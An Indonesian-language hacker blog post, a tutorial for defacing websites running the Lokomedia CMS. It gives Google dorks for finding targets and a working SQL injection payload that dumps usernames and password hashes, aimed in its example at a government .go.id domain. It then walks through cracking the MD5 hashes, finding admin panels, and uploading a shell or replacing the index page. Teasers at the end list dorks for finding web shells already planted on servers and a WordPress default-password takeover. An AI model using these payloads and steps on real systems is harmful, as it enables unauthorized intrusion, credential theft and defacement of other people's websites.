Cara Deface poc SQL LOKOMEDIA

-
Assalamualaikum jumpa lagi dengan saya MrBlachat kali ini aku akan kasih saya kasih tutorial cara deface SQL LOKOMEDIA Oke langsung saja

Bahan
- hp/pc
- dork
- internet pastinya
- MD 5Decrypter
- pacar biar ada yang semangatin
- kopi biar otak fresss

Dork:- inurl:statis-1-pengantar.html
            - inurl:statis-1/profil.html
            - inurl:statis-19-beasiswa.html
            - inurl:statis-22-kerjasama.html
Kembangin lagi gan sesuai otak kalian

Exploit: 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Ok langsung saja ke tutorial nya
Pertama kalian dorking di google kesayangan anda kayak seperti di bawah ini


Jika kalian dah punya target tinggal kalian masukkan exploit nya di atas
Contoh:
http://nama domain.go.id/statis-'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+1-profil.html

Jika sudah nati akan ketahuan unser name nya dan passnya untuk cara lihat nya Kalian tulis
view-source: masukan di belakang https:// atau CTRL+U  pada perangkat kalian Cari bagian <title> nanti akan ada unser passnya tapi pass nya dalam bentuk MD5  kayak gambar di bawah ini.
Nanti akan muncul banyak unser sama pass tergantung dari websitenya.

Habis itu copy password nya yang bentuk angka itu dan pastikan di MD5.

Jika sudah nemu passwordnya kalian tinggal login untuk cara login nya di bawah ini

Site.com/administrator
Site.com/adminweb
Site.com/admin
Site.com/cp-admin
Site.com/redaktur
Site.com/Panel



Pulih salah satu halaman web tersebut, jika tidak bisa kalian juga bisa makai pake aplikasi
Admin Login Finder

Jika kalian sudah berhasil login terserah kalian mau ngapain upload shell atau tebas index terserah.
Sekian dari tutorial dari saya mohon maaf jika ada kesalahan atau pun apa wassalamualaikum wr wb sampai jumpa lagi di blog selanjutnya 😇

Komentar

Posting Komentar

Postingan populer dari blog ini

Cara deface dorking shell tebas index

-
Gambar
Assalamu'alaikum wr wb Jumpa lagi dengan saya MrBlackhat kali ini saya akan kasih tutorial cara dorking shell tanpa basa basi kita langsung saja ke tutorialnya cekidot Bahan: - HP/laptop - shell/script deface kalian - pacar biar ada semangatin Dork:  intitle:index of wso.php intext:64k intitle:index of lux.php intext:64k intitle:index of mego.php Intex:64k intitle:index of raw.php intext:64k intitle:index of H3IIO.php intext:64k intitle:index of H3IIX.php intext:48k intitle:index of shell.php intext:64k intitle:index of cgi.php intext:64k intitle:index of DrugO.php intext:64k intitle:index of xleet.php intext:48k [New Dork] intitle:index of / cgp.php intitle:index of / pgp.php intitle:index of / shell23.php intitle:index of / semo.php intitle:index of / shell9.php intitle:index of / Cih.php intitle:index of / cp2019.php intitle:index of / ml.php intitle:index of / dr.php intitle:index of / df.php intitle:index of / mst.php intitle:index of / full.ph...
Baca selengkapnya

Pengertian John the ripper Dan cara menjalankannya

-
Gambar
Assalamualaikum wr wb Jumpa dengan saya ridwan Gans oke kali ini kita gak akan tutorial karna tidak Nemu web vuln:v Oke kali kita akan bahas tentang pengertian software John the ripper siapa sih yang gak kenal dengan software yang satu ini John The Ripper  adalah suatu cr acker password yang cepat yang tersedia pada banyak platfom, antara lain UNIX, Windows, DOS, BeOS dan OpenVMS. Tujuan utama dari  John The Ripper adalah untuk mendeteksi kelemahan password pada sistem UNIX (termasuk Linux). Beberapa tips yg akan mempermudah saat menginstal John the Ripper pada windows 1. Simpan di C:/ , jangan di program files maupun folder apapun. 2. Ketika menginstal mungkin akan terlihat seperti C: / John/john1701 / dll Pindahkan semuanya keluar dari folder john1701 dan masuk ke folder pertama. Kemudian hapus john1701. 3. Sekarang ketika Anda masuk ke drive C anda dan membuka folder john, Anda akan melihat kedua folder doc untuk menjalankan, bukan john1701 4. Dalam run f...
Baca selengkapnya

Cara Deface poc Wp u/p default 2020?!

-
Gambar
 Assalamu'alaikum wr wb jumpa lagi dengan syaa MrBlackhat kali ini gua akan kasih tutorial sesuai dengan judul oke langsung tanpa basabasi kita mulai:v Bahan: you know lah bang jago:v Dork: -intitle:"My Blog - My wordpress Blog" site:terserah lu cok:v Pertama kalian dorking dulu cokkk:v oke Jika kalian dah nemu target masukan exploit nya di bawah ini Exploit:wp-login.php Contoh:site.com/wp-login U/p: admin/pass U/p:admin/admin Jika vuln maka masuk ke dashboard nya seperti di bawah ini Trus kalian mencet plugins trus cari File Manager kalau ada tulisan install berarti di install dulu tod oke kalau sudah kalian mencet kayak gambar di atas oke Terserah kalian mau apain tuh website kalau kalian ingin tebas bisa caranya gimana bang? Hapus tuh file index.php ganti SC hacked kalian oke cara manggil nya gmn bang?  Hapus di belakang domainnya contoh Site.com/wp-admin/plugins bla bla  Menjadi site.com Nanti hasilnya kayak gini Sekian dari syaa wassalamu'alaikum wr wb jika kalia...
Baca selengkapnya